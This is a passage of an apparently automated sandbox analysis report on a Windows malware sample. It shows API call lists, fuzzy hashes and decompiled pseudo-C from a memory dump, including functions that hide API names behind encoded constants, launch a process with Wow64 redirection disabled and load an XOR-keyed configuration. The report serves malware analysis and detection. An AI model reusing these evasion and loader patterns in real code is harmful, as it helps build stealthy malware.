                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: lstrlen$CountFreeHeapTick
                        • String ID:
                        • API String ID: 2535036572-0
                        • Opcode ID: b48f3383ba591cdc15785dc0f1aa99bc32cff1a5222c823ced1b17e191f5c9e3
                        • Instruction ID: 0f366ccff031d401ab19fccbcd0c865a4c9974a15c7ca83d97fc2be63b5ee747
                        • Opcode Fuzzy Hash: b48f3383ba591cdc15785dc0f1aa99bc32cff1a5222c823ced1b17e191f5c9e3
                        • Instruction Fuzzy Hash: FE412972900219FBDF11AFA4CD48EDEBBB5EF44348F458094ED04A7321D735AA25EB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 61%
                        			E04777836(void* __eax, void* __ecx) {
                        				long _v8;
                        				void* _v12;
                        				void* _v16;
                        				void* _v28;
                        				long _v32;
                        				void _v104;
                        				char _v108;
                        				long _t39;
                        				intOrPtr _t43;
                        				intOrPtr _t50;
                        				void* _t52;
                        				intOrPtr _t53;
                        				void* _t61;
                        				intOrPtr* _t66;
                        				intOrPtr* _t73;
                        				intOrPtr* _t76;
                        
                        				_t1 = __eax + 0x14; // 0x74183966
                        				_t71 =  *_t1;
                        				_t39 = E047771A3(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                        				_v8 = _t39;
                        				if(_t39 != 0) {
                        					L12:
                        					return _v8;
                        				}
                        				E04777973( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
                        				_t43 = _v12(_v12);
                        				_v8 = _t43;
                        				if(_t43 == 0 && ( *0x477a2b8 & 0x00000001) != 0) {
                        					_v32 = 0;
                        					asm("stosd");
                        					asm("stosd");
                        					asm("stosd");
                        					_v108 = 0;
                        					memset( &_v104, 0, 0x40);
                        					_t50 =  *0x477a2d0; // 0x96d5a8
                        					_t18 = _t50 + 0x477b55b; // 0x73797325
                        					_t52 = E04771000(_t18);
                        					_v12 = _t52;
                        					if(_t52 == 0) {
                        						_v8 = 8;
                        					} else {
                        						_t53 =  *0x477a2d0; // 0x96d5a8
                        						_t20 = _t53 + 0x477b73d; // 0x50e8ce5
                        						_t21 = _t53 + 0x477b0af; // 0x4e52454b
                        						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
                        						if(_t66 == 0) {
                        							_v8 = 0x7f;
                        						} else {
                        							_t73 = __imp__;
                        							_v108 = 0x44;
                        							 *_t73(0);
                        							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
                        							 *_t73(1);
                        							if(_t61 == 0) {
                        								_v8 = GetLastError();
                        							} else {
                        								CloseHandle(_v28);
                        								CloseHandle(_v32);
                        							}
                        						}
                        						HeapFree( *0x477a290, 0, _v12);
                        					}
                        				}
                        				_t76 = _v16;
                        				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
                        				E04772A03(_t76);
                        				goto L12;
                        			}




















                        APIs
                          • Part of subcall function 047771A3: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,04777852,?,?,?,?,00000000,00000000), ref: 047771C8
                          • Part of subcall function 047771A3: GetProcAddress.KERNEL32(00000000,7243775A), ref: 047771EA
                          • Part of subcall function 047771A3: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04777200
                          • Part of subcall function 047771A3: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04777216
                          • Part of subcall function 047771A3: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 0477722C
                          • Part of subcall function 047771A3: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04777242
                        • memset.NTDLL ref: 047778A0
                          • Part of subcall function 04771000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,04774F1C,73797325), ref: 04771011
                          • Part of subcall function 04771000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0477102B
                        • GetModuleHandleA.KERNEL32(4E52454B,050E8CE5,73797325), ref: 047778D7
                        • GetProcAddress.KERNEL32(00000000), ref: 047778DE
                        • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 047778F8
                        • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 04777916
                        • CloseHandle.KERNEL32(00000000), ref: 04777925
                        • CloseHandle.KERNEL32(?), ref: 0477792A
                        • GetLastError.KERNEL32 ref: 0477792E
                        • HeapFree.KERNEL32(00000000,?), ref: 0477794A
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                        • String ID:
                        • API String ID: 91923200-0
                        • Opcode ID: 969c599b370befbeafc58135abc3b6477fd4aa4665312db218ddbf83c057fe89
                        • Instruction ID: 54fb45e17c9e65b107bf81e63206057a9187517c3070d8d754f36b4c65cf730a
                        • Opcode Fuzzy Hash: 969c599b370befbeafc58135abc3b6477fd4aa4665312db218ddbf83c057fe89
                        • Instruction Fuzzy Hash: A53159B1A02219ABEF11AFA4D848EDEBFB8FF08354F908451E605A3211D774BA04CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • __CxxThrowException@8.LIBCMT ref: 6C540BC4
                        • __CxxThrowException@8.LIBCMT ref: 6C540BF0
                        • __CxxThrowException@8.LIBCMT ref: 6C540C18
                        • __CxxThrowException@8.LIBCMT ref: 6C540C40
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: Exception@8Throw
                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                        • API String ID: 2005118841-1866435925
                        • Opcode ID: 429c4468475db921b00b9096753fc794fb5a428e664bc60f92caa244a2985ded
                        • Instruction ID: b71d36da2941e9db466c079a93c16259e1c608bbb9f565c9389e2f4587984876
                        • Opcode Fuzzy Hash: 429c4468475db921b00b9096753fc794fb5a428e664bc60f92caa244a2985ded
                        • Instruction Fuzzy Hash: 120196B1449340FAD310FA21CC1AF8E77E5DB94708F50CC0AB18866E83EB749D08CB5A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • __EH_prolog3.LIBCMT ref: 6C542969
                        • std::_Lockit::_Lockit.LIBCPMT ref: 6C542973
                          • Part of subcall function 6C542000: __lock.LIBCMT ref: 6C542011
                          • Part of subcall function 6C53EB90: std::_Lockit::_Lockit.LIBCPMT ref: 6C53EB9F
                        • codecvt.LIBCPMT ref: 6C5429AD
                        • std::bad_exception::bad_exception.LIBCMT ref: 6C5429C1
                        • __CxxThrowException@8.LIBCMT ref: 6C5429CF
                        • std::_Facet_Register.LIBCPMT ref: 6C5429E5
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: std::_$LockitLockit::_$Exception@8Facet_H_prolog3RegisterThrow__lockcodecvtstd::bad_exception::bad_exception
                        • String ID: bad cast
                        • API String ID: 1512642153-3145022300
                        • Opcode ID: 4befa1e2826299c597247581e6089d527d3f9c715ad8a4e9d6d65647c3228bfe
                        • Instruction ID: f66e3b0509322ebd4d2618b74728fa0dd5c9f94d04fedd6c86a06cde9ad1e8ef
                        • Opcode Fuzzy Hash: 4befa1e2826299c597247581e6089d527d3f9c715ad8a4e9d6d65647c3228bfe
                        • Instruction Fuzzy Hash: 38016D76900128DBCF05DBA4CC58AEE73B4BF84729F158519E415EBAD0EF349D48C791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • _localeconv.LIBCMT ref: 6C53FC53
                        • __Getcvt.LIBCPMT ref: 6C53FC61
                          • Part of subcall function 6C542252: ____lc_codepage_func.LIBCMT ref: 6C542269
                          • Part of subcall function 6C542252: ____mb_cur_max_func.LIBCMT ref: 6C542272
                          • Part of subcall function 6C542252: ____lc_locale_name_func.LIBCMT ref: 6C54227A
                        • __Getcvt.LIBCPMT ref: 6C53FCBC
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: Getcvt$____lc_codepage_func____lc_locale_name_func____mb_cur_max_func_localeconv
                        • String ID: ,$false$true
                        • API String ID: 3073657462-760133229
                        • Opcode ID: d8f6ee8eca85715ad7a08ad78b90aa49e1d69ea61e62b7b83323c7bc6fdcdedf
                        • Instruction ID: 8834043d077a69b7c08770166c50ea18451bfac1bdd7d68add71ef2f92f6b3e9
                        • Opcode Fuzzy Hash: d8f6ee8eca85715ad7a08ad78b90aa49e1d69ea61e62b7b83323c7bc6fdcdedf
                        • Instruction Fuzzy Hash: B25180B1C04258DADB11CF94CC44BEEBBB8FF84304F14425AD855AB741E735AA49CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                          • Part of subcall function 6C54C407: __getptd_noexit.LIBCMT ref: 6C54C408
                          • Part of subcall function 6C54C407: __amsg_exit.LIBCMT ref: 6C54C415
                        • RtlEncodePointer.NTDLL(00000000), ref: 6C5461D8
                        • _CallSETranslator.LIBCMT ref: 6C54620E
                        • _GetRangeOfTrysToCheck.LIBCMT ref: 6C546238
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: CallCheckEncodePointerRangeTranslatorTrys__amsg_exit__getptd_noexit
                        • String ID: MOC$RCC$=b
                        • API String ID: 3119380580-92667700
                        • Opcode ID: 31fcebf25edf5e1b293eea4ad50211a7bb706fd41ef7e882c172172c3ff5cddb
                        • Instruction ID: e0a020fb7f47155d08f004e49641e3f213ad8650c6e9a86ae8644b9b8bf4d127
                        • Opcode Fuzzy Hash: 31fcebf25edf5e1b293eea4ad50211a7bb706fd41ef7e882c172172c3ff5cddb
                        • Instruction Fuzzy Hash: 21416732504209EFDB11CF84CC80FEEB7B6EF84318F298259E914A7651DB35AD61DB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 6C53E03D
                          • Part of subcall function 6C542000: __lock.LIBCMT ref: 6C542011
                        • std::_Lockit::_Lockit.LIBCPMT ref: 6C53E063
                        • std::bad_exception::bad_exception.LIBCMT ref: 6C53E0E7
                        • __CxxThrowException@8.LIBCMT ref: 6C53E0F6
                        • std::_Facet_Register.LIBCPMT ref: 6C53E10D
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: std::_$LockitLockit::_$Exception@8Facet_RegisterThrow__lockstd::bad_exception::bad_exception
                        • String ID: bad cast
                        • API String ID: 153433846-3145022300
                        • Opcode ID: a1c577e7a7fe06a0d8f3e36c08da0fc5a40986e460d3028bc25f038202eebf3a
                        • Instruction ID: 24a92fc28ffa20d1ed09a0231849950d761a9d1c9887f73e1b4ecd0fbfc30e3c
                        • Opcode Fuzzy Hash: a1c577e7a7fe06a0d8f3e36c08da0fc5a40986e460d3028bc25f038202eebf3a
                        • Instruction Fuzzy Hash: AE31C532508220CFCB10CF24CC90B5AB7F5EB89728F054A19E85997B91E775ED05CBD2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 6C53DF0D
                          • Part of subcall function 6C542000: __lock.LIBCMT ref: 6C542011
                        • std::_Lockit::_Lockit.LIBCPMT ref: 6C53DF33
                        • std::bad_exception::bad_exception.LIBCMT ref: 6C53DFB7
                        • __CxxThrowException@8.LIBCMT ref: 6C53DFC6
                        • std::_Facet_Register.LIBCPMT ref: 6C53DFDD
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: std::_$LockitLockit::_$Exception@8Facet_RegisterThrow__lockstd::bad_exception::bad_exception
                        • String ID: bad cast
                        • API String ID: 153433846-3145022300
                        • Opcode ID: 6e511c3f4308784bb198772bdeab7a2bfec85ee58d8fe09a2b453b4d99a871b2
                        • Instruction ID: 6b89a0006f1cd8ad394a4d0d3db7ddc34f10d4aa20033ce2df97baf30461c1f4
                        • Opcode Fuzzy Hash: 6e511c3f4308784bb198772bdeab7a2bfec85ee58d8fe09a2b453b4d99a871b2
                        • Instruction Fuzzy Hash: 0A31C371518220DFCB11CF28CC84B5AB7F5EB8A728F154619E85997B91E730ED09CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E0477374B(int* __ecx) {
                        				int _v8;
                        				void* _v12;
                        				void* __esi;
                        				signed int _t20;
                        				signed int _t25;
                        				char* _t31;
                        				char* _t32;
                        				char* _t33;
                        				char* _t34;
                        				char* _t35;
                        				void* _t36;
                        				void* _t37;
                        				intOrPtr _t38;
                        				signed int _t44;
                        				void* _t46;
                        				void* _t47;
                        				signed int _t49;
                        				signed int _t53;
                        				signed int _t57;
                        				signed int _t61;
                        				signed int _t65;
                        				signed int _t69;
                        				void* _t74;
                        				intOrPtr _t90;
                        
                        				_t75 = __ecx;
                        				_t20 =  *0x477a2cc; // 0x63699bc3
                        				if(E04773D6B( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x110) {
                        					 *0x477a320 = _v12;
                        				}
                        				_t25 =  *0x477a2cc; // 0x63699bc3
                        				if(E04773D6B( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
                        					_push(2);
                        					_pop(0);
                        					goto L48;
                        				} else {
                        					_t74 = _v12;
                        					if(_t74 == 0) {
                        						_t31 = 0;
                        					} else {
                        						_t69 =  *0x477a2cc; // 0x63699bc3
                        						_t31 = E0477257B(_t75, _t74, _t69 ^ 0x724e87bc);
                        					}
                        					if(_t31 != 0) {
                        						_t75 =  &_v8;
                        						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                        							 *0x477a298 = _v8;
                        						}
                        					}
                        					if(_t74 == 0) {
                        						_t32 = 0;
                        					} else {
                        						_t65 =  *0x477a2cc; // 0x63699bc3
                        						_t32 = E0477257B(_t75, _t74, _t65 ^ 0x2b40cc40);
                        					}
                        					if(_t32 != 0) {
                        						_t75 =  &_v8;
                        						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                        							 *0x477a29c = _v8;
                        						}
                        					}
                        					if(_t74 == 0) {
                        						_t33 = 0;
                        					} else {
                        						_t61 =  *0x477a2cc; // 0x63699bc3
                        						_t33 = E0477257B(_t75, _t74, _t61 ^ 0x3b27c2e6);
                        					}
                        					if(_t33 != 0) {
                        						_t75 =  &_v8;
                        						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                        							 *0x477a2a0 = _v8;
                        						}
                        					}
                        					if(_t74 == 0) {
                        						_t34 = 0;
                        					} else {
                        						_t57 =  *0x477a2cc; // 0x63699bc3
                        						_t34 = E0477257B(_t75, _t74, _t57 ^ 0x0602e249);
                        					}
                        					if(_t34 != 0) {
                        						_t75 =  &_v8;
                        						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
                        							 *0x477a004 = _v8;
                        						}
                        					}
                        					if(_t74 == 0) {
                        						_t35 = 0;
                        					} else {
                        						_t53 =  *0x477a2cc; // 0x63699bc3
                        						_t35 = E0477257B(_t75, _t74, _t53 ^ 0x3603764c);
                        					}
                        					if(_t35 != 0) {
                        						_t75 =  &_v8;
                        						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
                        							 *0x477a02c = _v8;
                        						}
                        					}
                        					if(_t74 == 0) {
                        						_t36 = 0;
                        					} else {
                        						_t49 =  *0x477a2cc; // 0x63699bc3
                        						_t36 = E0477257B(_t75, _t74, _t49 ^ 0x2cc1f2fd);
                        					}
                        					if(_t36 != 0) {
                        						_push(_t36);
                        						_t46 = 0x10;
                        						_t47 = E04775A4E(_t46);
                        						if(_t47 != 0) {
                        							_push(_t47);
                        							E0477461D();
                        						}
                        					}
                        					if(_t74 == 0) {
                        						_t37 = 0;
                        					} else {
                        						_t44 =  *0x477a2cc; // 0x63699bc3
                        						_t37 = E0477257B(_t75, _t74, _t44 ^ 0xb30fc035);
                        					}
                        					if(_t37 != 0 && E04775A4E(0, _t37) != 0) {
                        						_t90 =  *0x477a37c; // 0x50e9630
                        						E04776027(_t90 + 4, _t42);
                        					}
                        					_t38 =  *0x477a2d0; // 0x96d5a8
                        					_t18 = _t38 + 0x477b2d2; // 0x50e887a
                        					_t19 = _t38 + 0x477b7c4; // 0x6976612e
                        					 *0x477a31c = _t18;
                        					 *0x477a390 = _t19;
                        					HeapFree( *0x477a290, 0, _t74);
                        					L48:
                        					return 0;
                        				}
                        			}




























                        APIs
                        • StrToIntExA.SHLWAPI(00000000,00000000,04772F44,?,04772F44,63699BC3,?,04772F44,63699BC3,E8FA7DD7,0477A00C,745EC740,?,?,04772F44), ref: 047737D0
                        • StrToIntExA.SHLWAPI(00000000,00000000,04772F44,?,04772F44,63699BC3,?,04772F44,63699BC3,E8FA7DD7,0477A00C,745EC740,?,?,04772F44), ref: 04773802
                        • StrToIntExA.SHLWAPI(00000000,00000000,04772F44,?,04772F44,63699BC3,?,04772F44,63699BC3,E8FA7DD7,0477A00C,745EC740,?,?,04772F44), ref: 04773834
                        • StrToIntExA.SHLWAPI(00000000,00000000,04772F44,?,04772F44,63699BC3,?,04772F44,63699BC3,E8FA7DD7,0477A00C,745EC740,?,?,04772F44), ref: 04773866
                        • StrToIntExA.SHLWAPI(00000000,00000000,04772F44,?,04772F44,63699BC3,?,04772F44,63699BC3,E8FA7DD7,0477A00C,745EC740,?,?,04772F44), ref: 04773898
                        • HeapFree.KERNEL32(00000000,?,?,04772F44,63699BC3,?,04772F44,63699BC3,E8FA7DD7,0477A00C,745EC740,?,?,04772F44), ref: 04773934
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: 0187e225ab362a49bc1e9aee4b34841b41e9628fda873762e569e116691fc70e
                        • Instruction ID: a33b23eedf6064df88989c673f88ab900ab3045daa34eeacd66d1c400af265e5
                        • Opcode Fuzzy Hash: 0187e225ab362a49bc1e9aee4b34841b41e9628fda873762e569e116691fc70e
                        • Instruction Fuzzy Hash: 85513671B10205ABEF11EBB9DDC8C9F77ADDB487407E48965A901D7305E639FA00EB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SysAllocString.OLEAUT32(?), ref: 04772C4F
                        • SysAllocString.OLEAUT32(0070006F), ref: 04772C63
                        • SysAllocString.OLEAUT32(00000000), ref: 04772C75
                        • SysFreeString.OLEAUT32(00000000), ref: 04772CD9
                        • SysFreeString.OLEAUT32(00000000), ref: 04772CE8
                        • SysFreeString.OLEAUT32(00000000), ref: 04772CF3
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: String$AllocFree
                        • String ID:
                        • API String ID: 344208780-0
                        • Opcode ID: 9084393980c18ef63c035ad51062b3a79415f0efe85340a0d7a79b501fc81f4e
                        • Instruction ID: 58b5ccde2557cb09e13044357807a7e26f26540937d564e8f7fe55f3bf061fea
                        • Opcode Fuzzy Hash: 9084393980c18ef63c035ad51062b3a79415f0efe85340a0d7a79b501fc81f4e
                        • Instruction Fuzzy Hash: 62316076D00609ABDF01DFA8C948ADFBBBAEF48300F544465ED10EB211DB75AE09CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E047771A3(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                        				intOrPtr _v8;
                        				intOrPtr _t23;
                        				intOrPtr _t26;
                        				_Unknown_base(*)()* _t28;
                        				intOrPtr _t30;
                        				_Unknown_base(*)()* _t32;
                        				intOrPtr _t33;
                        				_Unknown_base(*)()* _t35;
                        				intOrPtr _t36;
                        				_Unknown_base(*)()* _t38;
                        				intOrPtr _t39;
                        				_Unknown_base(*)()* _t41;
                        				intOrPtr _t44;
                        				struct HINSTANCE__* _t48;
                        				intOrPtr _t54;
                        
                        				_t54 = E04775C4E(0x20);
                        				if(_t54 == 0) {
                        					_v8 = 8;
                        				} else {
                        					_t23 =  *0x477a2d0; // 0x96d5a8
                        					_t1 = _t23 + 0x477b11a; // 0x4c44544e
                        					_t48 = GetModuleHandleA(_t1);
                        					_t26 =  *0x477a2d0; // 0x96d5a8
                        					_t2 = _t26 + 0x477b787; // 0x7243775a
                        					_v8 = 0x7f;
                        					_t28 = GetProcAddress(_t48, _t2);
                        					 *(_t54 + 0xc) = _t28;
                        					if(_t28 == 0) {
                        						L8:
                        						E04772A03(_t54);
                        					} else {
                        						_t30 =  *0x477a2d0; // 0x96d5a8
                        						_t5 = _t30 + 0x477b774; // 0x614d775a
                        						_t32 = GetProcAddress(_t48, _t5);
                        						 *(_t54 + 0x10) = _t32;
                        						if(_t32 == 0) {
                        							goto L8;
                        						} else {
                        							_t33 =  *0x477a2d0; // 0x96d5a8
                        							_t7 = _t33 + 0x477b797; // 0x6e55775a
                        							_t35 = GetProcAddress(_t48, _t7);
                        							 *(_t54 + 0x14) = _t35;
                        							if(_t35 == 0) {
                        								goto L8;
                        							} else {
                        								_t36 =  *0x477a2d0; // 0x96d5a8
                        								_t9 = _t36 + 0x477b756; // 0x4e6c7452
                        								_t38 = GetProcAddress(_t48, _t9);
                        								 *(_t54 + 0x18) = _t38;
                        								if(_t38 == 0) {
                        									goto L8;
                        								} else {
                        									_t39 =  *0x477a2d0; // 0x96d5a8
                        									_t11 = _t39 + 0x477b7ac; // 0x6c43775a
                        									_t41 = GetProcAddress(_t48, _t11);
                        									 *(_t54 + 0x1c) = _t41;
                        									if(_t41 == 0) {
                        										goto L8;
                        									} else {
                        										 *((intOrPtr*)(_t54 + 4)) = _a4;
                        										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                        										_t44 = E0477225C(_t54, _a8);
                        										_v8 = _t44;
                        										if(_t44 != 0) {
                        											goto L8;
                        										} else {
                        											 *_a12 = _t54;
                        										}
                        									}
                        								}
                        							}
                        						}
                        					}
                        				}
                        				return _v8;
                        			}

                        APIs
                          • Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A
                        • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,04777852,?,?,?,?,00000000,00000000), ref: 047771C8
                        • GetProcAddress.KERNEL32(00000000,7243775A), ref: 047771EA
                        • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04777200
                        • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04777216
                        • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 0477722C
                        • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04777242
                          • Part of subcall function 0477225C: memset.NTDLL ref: 047722DB
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: AddressProc$AllocateHandleHeapModulememset
                        • String ID:
                        • API String ID: 1886625739-0
                        • Opcode ID: 500b20f7d1d299adee0b62ba7235beaca1fff3733ae6a66580696e377156cd14
                        • Instruction ID: 4c99c578b2465243b104369f5b1fe5ed113cd3bf313b775819df671d331438dd
                        • Opcode Fuzzy Hash: 500b20f7d1d299adee0b62ba7235beaca1fff3733ae6a66580696e377156cd14
                        • Instruction Fuzzy Hash: EE21FEB1600206EFEB20DF69CE44E5A77FCEB44744B818565E615CB211E635FD058BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: CurrentThread__calloc_crt__initptd__mtinitlocks__mtterm
                        • String ID:
                        • API String ID: 2314865971-0
                        • Opcode ID: 7fa9ce45af2ec6482d4151b97cfcc817b04ce953337f276aa2dae583f31a88ce
                        • Instruction ID: 450b48cbd1d5bf3d31011e6910bc922675441b8ffd56e78f29fa017a9fcd88cb
                        • Opcode Fuzzy Hash: 7fa9ce45af2ec6482d4151b97cfcc817b04ce953337f276aa2dae583f31a88ce
                        • Instruction Fuzzy Hash: DBF02B326196519EEA247A746C016DF3ED08FC27B8F21C61AE060D5FD0FF11BC4D92A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ____lc_codepage_func.LIBCMT ref: 6C5421EA
                        • __calloc_crt.LIBCMT ref: 6C5421FB
                          • Part of subcall function 6C547076: __calloc_impl.LIBCMT ref: 6C547085
                        • ___pctype_func.LIBCMT ref: 6C54220E
                        • _memmove.LIBCMT ref: 6C542217
                        • ___pctype_func.LIBCMT ref: 6C542228
                        • ____lc_locale_name_func.LIBCMT ref: 6C542234
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: ___pctype_func$____lc_codepage_func____lc_locale_name_func__calloc_crt__calloc_impl_memmove
                        • String ID:
                        • API String ID: 1321936363-0
                        • Opcode ID: 8d6311f69feffcaa9524e7c25394635f42cf47d37fc1137e5c74f253cb285a3a
                        • Instruction ID: dd036db6073648b4b921246560563bc2f7dccf9fa799ff66045b81171161632a
                        • Opcode Fuzzy Hash: 8d6311f69feffcaa9524e7c25394635f42cf47d37fc1137e5c74f253cb285a3a
                        • Instruction Fuzzy Hash: 52F0A971544B01EBE7109FA5AC09B86B7D4AF40359F10C82DE598CBB80EBB5E8448B51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 6C5404D3
                          • Part of subcall function 6C543E01: _malloc.LIBCMT ref: 6C543E19
                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 6C540507
                        • _memmove.LIBCMT ref: 6C54057B
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception$_malloc_memmove
                        • String ID: string too long
                        • API String ID: 4023115364-2556327735
                        • Opcode ID: 328f56d0a355aecfea1c6635686e23498e51967527770bfdf0ed9e88d1548f91
                        • Instruction ID: 3f3128896fdc98e9325244940e7c7e56eb08946a64dd683fd655f9b03fcfda5a
                        • Opcode Fuzzy Hash: 328f56d0a355aecfea1c6635686e23498e51967527770bfdf0ed9e88d1548f91
                        • Instruction Fuzzy Hash: 2751E9327012518BD7248E2CAC50A5BB3A5EFE1714F308D2FE592CBF81D761E845C7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 32%
                        			E047763CD(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
                        				intOrPtr _v36;
                        				intOrPtr _v44;
                        				intOrPtr _v48;
                        				intOrPtr _v52;
                        				void _v60;
                        				char _v64;
                        				long _t18;
                        				intOrPtr _t22;
                        				intOrPtr _t23;
                        				long _t29;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				intOrPtr* _t32;
                        
                        				_t30 = __edi;
                        				_t29 = _a4;
                        				_t31 = __eax;
                        				_t18 = E04772BF3(_t29, __edi, __eax);
                        				_a4 = _t18;
                        				if(_t18 != 0) {
                        					memset( &_v60, 0, 0x38);
                        					_t22 =  *0x477a2d0; // 0x96d5a8
                        					_v64 = 0x3c;
                        					if(_a8 == 0) {
                        						_t7 = _t22 + 0x477b4e0; // 0x70006f
                        						_t23 = _t7;
                        					} else {
                        						_t6 = _t22 + 0x477b92c; // 0x750072
                        						_t23 = _t6;
                        					}
                        					_v36 = _t31;
                        					_t32 = __imp__;
